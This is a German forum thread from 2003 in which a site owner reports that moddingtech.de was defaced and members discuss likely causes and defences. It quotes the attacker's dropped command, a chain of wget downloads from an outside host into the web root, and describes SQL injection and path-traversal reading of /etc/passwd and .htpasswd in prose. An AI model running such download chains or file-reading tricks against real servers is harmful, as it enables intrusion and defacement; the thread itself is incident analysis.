• 28.04.2024, 12:23
  • Registrieren
  • Anmelden
  • Sie sind nicht angemeldet.

 

Webseite gehackt!...???

Montag, 24. November 2003, 23:31

Hi,

wie einige von Euch wissen, gehört mir die Seite moddingtech.de.

Die Seite ist heute Opfer eines Hackerangriffs geworden... kein Scherz, ich konnts erst selber nicht glauben.
Das Ganze ist ca. um 18:30 heute passiert. Ich konnte es glücklicherweise kurz darauf rückgängig machen, da mir ein Leser einen Screenshot geschickt hat, so sah das aus:
Klick mich!

Es wurde die index-Datei ausgetauscht sowie einige Bilder in das root-Verzeichnis geladen, sonst scheint von der Seite alles da zu sein und zu funktionieren.

Ich frag mich:
Was mach ich jetzt? Soll/Muss ich meinen Provider informieren? Kann ich davon ausgehen dass der der das gemacht hat mein Passwort rausgefunden hat (ändern werd ichs auf jeden Fall), oder gibts andere Möglichkeiten sowas zu machen? Wer macht sowas überhaupt und mit welcher Motivation??
Ich muss sagen, das hat mich ja schon irgendwie geschockt, dass da einer einfach auf meinem Webspace rumgefummelt hat. >:( :P
C programmers never die. They are just cast into void. Neues moddingtech.de Portal online!

Nacht-Elf

unregistriert

Re: Webseite gehackt!...???

Montag, 24. November 2003, 23:34

ich würde sagen, die machen das, um
a) sich zu beweisen
b) zu zeigen, wie hart sie doch sind ::)

Re: Webseite gehackt!...???

Montag, 24. November 2003, 23:36

das is ne typische php-baukasten site... die löcher in diesen dingern sind so bekannt wie bill gates auf der Cebit. also erwarte nicht, daß du das irgendwie besser machen kannst - diese seiten sind prädistiniert für solche angriffe...

Re: Webseite gehackt!...???

Montag, 24. November 2003, 23:42

was meinst du mit php-baukasten-seite ???
alles auf der seite ist selbstgecodet, bis auf das news-skript.
C programmers never die. They are just cast into void. Neues moddingtech.de Portal online!

Re: Webseite gehackt!...???

Montag, 24. November 2003, 23:46

Zitat von »-Joker-«

was meinst du mit php-baukasten-seite  ???
alles auf der seite ist selbstgecodet, bis auf das news-skript.


respekt vor deiner leistung wenn wirklich jede zeile selbstgecoded ist, dann ist das visuelle Erscheinungsbild sehr gut. Dafür hast du dann aber wahrscheinlich jede Sicherungsfunktion vergessen. ;)

So ne PHP seite bzw. den Zugang dazu zu erlangen ist manchmal einfacher wie nen Reissverschluss zuzuziehen....

Re: Webseite gehackt!...???

Montag, 24. November 2003, 23:48

meine wurd auch letztens gehacked...
hab dann einfach mein passwort geändert und originalseite wieder aufgespielt :D

war aber auch ein bekannter dem in einer vorlesung langweilig war, also nix bösartiges *G*

Re: Webseite gehackt!...???

Montag, 24. November 2003, 23:52

hi. meld dich einfach mal bei yogi bzw jochen, der bei uns die php sachen etc macht, der kennt sich auch mit den sicherheitslücken gut aus!

Alex5

Senior Member

Re: Webseite gehackt!...???

Dienstag, 25. November 2003, 00:13

@chewy ich glaube nicht das das was mit php-baukasten zu tun hat. das man über php ne website defaced, also was auf dem webspace erstzt ist sehr selten würd ich sagen.

auf der seite hab ich jetzt keine auffälligen php-scripts gesehen.
neuste apache-version etc. is auch drauf.

ich tippe mal auf schwache ftp-passwörter.

die würde ich als erstes mal ändern. und dann würd ich mal die access logs durchgehen.

edit: und natürlich die error-logs (!) dann kannste immer noch deinem provider bescheid sagen. an dem liegt es glaub ich net. iss ja alles aufm aktuelle stand!

mfg alex

Re: Webseite gehackt!...???

Dienstag, 25. November 2003, 00:36

thx das werde ich mal tun.

ich glaube auch nicht, dass das was mit dem php zu tun hat.
wir haben z.B. kein CMS, wo man die artikel z.B. über ein web-interface hochladen kann... alles wird per ausschließlich per ftp hochgeladen... es gibt also keinerlei skripte, mit der man dateien hochladen könnte.
im prinzip ist die seite von der technik relativ "old-school", php wird lediglich nur zur vereinfachung von ein paar dingen eingesetzt (z.B. framelose seiten, in die per include das menü, header etc. integriert werden).
abgesehen von der gallery und dem news-skript wird auch kein sql verwendet.

also die logs seh ich mal an und das ftp-passwort ist geändert... will hoffen sowas passiert nicht nochmal >:(
C programmers never die. They are just cast into void. Neues moddingtech.de Portal online!

Re: Webseite gehackt!...???

Dienstag, 25. November 2003, 11:21

Bei mir sah es vor einiger Zeit so aus. Naja, wenigstens ist da noch eine aussage dabei und nicht nur ein blödes "wir waren da" wie bei euch auf moddingtech.de. ;)

Ich würde an Deiner Stelle auf jeden Fall den Provider informieren. Möglicherweise sind die Hacker über irgend eine Sicherheitslücke im Webserver auf die Seite gekommen auf die Du selbst keinerlei Einfluß hast, wohl aber der Provider. Das war bei meiner Seite der Fall. Da waren alle Webseiten betroffen die auf einem bestimmten Server lagen.
"I am a leaf on the wind, watch how I soar!
-- Hoban Washburn

moede

Senior Member

Re: Webseite gehackt!...???

Dienstag, 25. November 2003, 12:24

@ Chewy

Du scheinst dich ja auszukennen mit der Sicherheit von PHP Seiten. Könntest du mir ev sagen wo die häufigsten Fehler liegen?? Ich würde zwar behaupten meine Seite sei ziemlich sicher aber man kann ja nie genug vorsichtig sein.

peace
moede

Re: Webseite gehackt!...???

Dienstag, 25. November 2003, 16:28

es gibt durchaus angriffsmöglichkeiten bei großen forums- oder cms-system (phpBB, nuke, postnuke, phpkit, ...), deren bekanntheit natürlich mit der bekanntheit der systeme selbst ansteigt. diese werden natürlich auch schneller gefunden und gefixt als bei kleineren oder eigenen projekten, aber dafür muss man als webmaster auch oft genug upgraden - und bei für eigene zwecke modifiziertem code ist das manchmal nur sehr schwer bis gar nicht machbar.

solche lecks beschränken sich aber vorwiegend auf das verändern von daten in der datenbank mittels sql-injection - d.h. es wird an die url ein parameter angehängt, der ein sql-statement enthält oder erweitert (das bei ungenügendem check der parameter eben nicht geblockt wird) und mit dem es z.b. möglich ist, sich selbst admin-rechte zu geben. das erfordert jedoch eine gute kenntnis oder ein leicht durchschaubares system, und das ist natürlich bei größeren projekten eher der fall.
mangelhafte parameterprüfung kann auch direkt sicherheitsabfragen aushebeln, z.b. beim löschen von posts o.ä.

kürzlich habe ich bei einer in der modding-toplist _SEHR_ :) hoch platzierten seite ein leck gefunden, dass auf einen verbreiteten programmierfehler hinweist: per parameter wird ein dateiname angegeben und der inhalt der datei "in den rest der seite kopiert", so dass er vom design, menü usw. eingeschlossen wird. prüft man dann die pfadangaben nicht, so kann man prinzipiell mit einschränkungen (je nach fall) jede datei im webbrowser anzeigen lassen. auch wenn dies vllt keine passwörter enthüllt, so lässt sich doch zumindest über /etc/passwd, .htpasswd und co einiges an hilfreichen informationen ergattern. bei non-shadowed passwörtern wie z.b. in der .htpasswd lassen sich diese außerdem schön schnell und unbemerkt am eigenen rechner mittels bruteforce nachgenerieren und vergleichen, bei einem treffer hat man zugriff.

vollständige defacements erfordern jedoch zugriff auf das verzeichnis auf dem server, dass die webseiten enthält. dazu ist ftp-zugang eine gängige möglichkeit, aber minimalistische nachrichten können natürlich auch direkt auf dem system getippt und bilder mittels wget oder rcp auf den webserver übertragen worden sein. ein ungeschütztes phpMyAdmin oder leck auch nur im newsscript würde daher zwar für eine eingeschleuste botschaft reichen, aber eben nicht für ein defacement.
natürlich gibt es zahlreiche sicherheitslücken, die davon leben, dass sie nicht gepatcht werden, obwohl es bereits patches gibt. das kann bei webhostern natürlich ähnlich wie oben sehr aufwändig und auch zeitintensiv sein, manchmal passiert es jedoch aus unkenntnis oder ignoranz gar nicht. je mehr angebote gehostet werden, desto öfter sind z.b. auch admin-passwörter und systemeinstellungen die gleichen. und solche dinge werden auch meist nicht von schlampigen administratoren überprüft und erkannt.

in diesem fall muss wie gesagt wo anders die tür offen gewesen sein. sollte jemand versucht haben, via bruteforce an das ftp-passwort zu kommen (man braucht neben dem pw natürlich auch den usernamen, aber der lässt sich an vielen stellen ermitteln, zumal er oft identisch mit dem db-user oder db-namen ist), aber auch bei 8 zeichen lowercase dauert das schon lange. und sowas sollte eigentlich entdeckt werden oder zumindest über logs mehr als eindeutig nachvollziehbar sein.

auf jeden fall solltest du deinen webhoster möglichst detailliert über den vorfall informieren und ihn bitten, seine logs durchzusehen und dir ergebnisse mitzuteilen.
es ist äußerst fragwürdig, ob der angreifer zurückverfolgt werden kann, da er sicher nicht von seinem aol-zugang angegriffen hat, sondern über große umwege. aber es ist wichtig, dass die sicherheitslücke erkannt und geschlossen wird.

als webmaster empfiehlt es sich auch, regelmässige sql-dumps anzufertigen und aufzubewahren, um erst spät erkannte veränderungen von vor langer zeit rückgängig machen zu können. ein besonderes auge sollte dabei auf die tabelle mit den benutzer-accounts gelegt werden, denn nicht selten fügt ein unentdeckter eindringlich dort einen eigenen user mit diversen rechten hinzu, um später noch einen fuss in der tür zu haben.

so, hoffe das hat einen kleinen einblick gebracht und hilft für die zukunft.

moede

Senior Member

Re: Webseite gehackt!...???

Dienstag, 25. November 2003, 23:05

He danke, auch wenn ich nicht glaube dass du das jetzt auf meine Frage bezogen hast ;D

Jedenfalls habe ich an deinen Ausführungen bemerkt das ich offensichtlich keine dummen Fehler gemacht habe :)

peace
moede

Re: Webseite gehackt!...???

Mittwoch, 26. November 2003, 09:03

Hi

danke Y0Gi, das is wirklich mal ne umfassende Auskunft.
Solche Fehler mittels SQL-Injection kann ich denk ich ausschließen, da wie gesagt SQL bei mir nicht sehr häufig verwendet wird, und da wos verwendet wird hab ich mir durchaus die Mühe gemacht, die Parameter zu prüfen  ;)

wie funktioniert diese sache mit wget? ich kenn das bisher nicht, und scheinbar wurde diese methode in meinem fall verwendet. ich habe mir die dateien die bei mir hochgeladen worden sind mal genauer angesehen, eine txt-datei enthielt folgenden inhalt:

Zitat

wget http://geocities.yahoo.com.br/basenod/auto-mar.jpg ; wget http://geocities.yahoo.com.br/baseno/novo.txt ; mv novo.txt mega.html ; wget http://geocities.yahoo.com.br/basenod/help.txt ; mv help.txt mradminatention.html ; ls -alg ;


so ungefähr kann man sich ja vorstellen was das macht, aber kann mir das einer genauer erklären? die genannten dateien fanden sich jedenfalls alle im rootverzeichnis des webspace. die eine hab ich glatt übersehen  ::)
auch wenn ich die genannten dateien im rootverzeichnis gefunden habe, versteh ich damit auch immer noch nicht, wie die index-datei ausgetauscht wurde...?

die mradminatention hatte folgenden inhalt:

Zitat

Hello Mr. Administrator...

How Are You?

I discovered some bug's into your website...

If you want help mail-me...

megazoid@linuxmail.org

megazoid (WHITEHAT)


soll man das ernst nehmen oder wie und da echt hinschreiben ??? Sorry, hab bisher null erfhahrung mit som zeug  :P
C programmers never die. They are just cast into void. Neues moddingtech.de Portal online!

Re: Webseite gehackt!...???

Mittwoch, 26. November 2003, 13:55

was hattest du denn für ein pwd? Wenn es irgendein Wort ist das existiert, wurde sicher ein Brute Forcer benutzt. Wenn du dann noch den Login Namen so genannt hast wie der db name hast du dem hacker die tür geöffnet...... ;)

Re: Webseite gehackt!...???

Mittwoch, 26. November 2003, 14:15

wget ist ein programm, um eine datei z.b. via http oder ftp von einer angegebenen url runterzuladen. die von dir gefundene datei bewirkt folgendes:
3 dateien werden von einem billigwebspace runtergeladen (sind dort übrigens nicht mehr vorhanden) und 2 davon umbenannt. 'ls' ist ein kommando um verzeichniseinträge aufzulisten (hier zum überprüfen).

der typ hatte also offensichtlich (wie angenommen) vollen zugriff und nicht bloß über die site selbst.
da er diese datei entweder als ganzes ausgeführt hat (was schlau wäre) oder einzeln - egal, jedenfalls hatte er eine shell (das, wo man tippen kann) und nicht bloß ftp-zugriff. dem ist zu entnehmen, dass er sich eine lücke im server zunutze gemacht hat und nicht stumpf das ftp-pw gecrackt.

der junge scheint jedenfalls ein guter zu sein (blackhats = "böse hacker", whitehats = "gute hacker") und hat auf die sicherheitslücke aufmerksam und etwas ruhm einheimsen wollen.
frage: wurde deine seite gelöscht oder nur die index umbenannt? wenn sie noch da ist, untermalt das seine nicht-zerstörerischen absichten.
die @linuxmail-adresse deutet ebenfalls auf jemanden mit ahnung und guten absichten hin.
weiterhin sind die auf der deface-seite genannten namen bei google nicht (in diesem zusammenhang) zu finden, was auch für ein durchdachtes vorgehen spricht und keine kiddie-cracker-gruppe ausm quakenet, die auf dicke hose macht.
an seinem englisch (im dateiname fehlt ein 't' bei 'attention', 'into your website' ist falsch) wird deutlich, dass dies nicht seine muttersprache ist. den dateinamen von ihm (novo.txt) und der geocities-toplevel-domain '.br' nach kommt er aus brasilien oder einem anderen südamerikanischen land (liegt nahe, verschleierung scheint hier nicht versucht worden zu sein).
jedenfalls solltest du ihn unbedingt anschreiben (kost ja nix) und höflich nach seinem eingangstor fragen, dich dafür bedanken und seine zurückhaltende, nicht allzu schädliche vorgehensweise evtl. positiv hervorheben. diese sicherheitslücke solltest du dann umgehend deinem webhoster mitteilen. letzteren den kontakt abwickeln zu lassen halte ich für fatal, denn u.u. passiert da überhaupt nichts oder die spielen sich auf und dann kommt auch nix bei raus.

lass hören wenn's was neues gibt :)

edit: du hast ja schon geschrieben, dass deine seite sonst unverändert ist, also vergiss was ich gesagt hab :)

Re: Webseite gehackt!...???

Mittwoch, 26. November 2003, 18:07

was vielleicht nicht rübergekommen ist: der eindringlich hat wohl eher zufällig den server gefunden und hatte es weniger auf die seite selbst abgesehen.

Re: Webseite gehackt!...???

Mittwoch, 26. November 2003, 20:29

Einmal mehr, danke für die Ausführungen.

Ich hab ihn gerade angeschrieben, mal sehen was zurückkommt ;)

Edith: ach ja... @freak
mein ftp-passwort ist eine buchstaben-zahlen-sonderzeichen-kombination, also von daher denk ich ist schon alles in ordnung. allerdings muss ich zugeben dass ich es in letzter zeit nicht gerade oft geändert habe ::)
C programmers never die. They are just cast into void. Neues moddingtech.de Portal online!

Re: Webseite gehackt!...???

Mittwoch, 26. November 2003, 21:26

ist dein PW evtl.: e^(j*pi)+1=0 ;)
Das scheint aber wirklich nen "lieber" Hacker gewesen zu sein, weil er, als schlauer böser Hacker nichts gesagt hätte und lieber still und heimlich die Admin-rechte auf dem Server genutzt hätte.

Nacht-Elf

unregistriert

Re: Webseite gehackt!...???

Mittwoch, 26. November 2003, 22:34

hm... posteste dann mal die antwort von dem hacker @ joker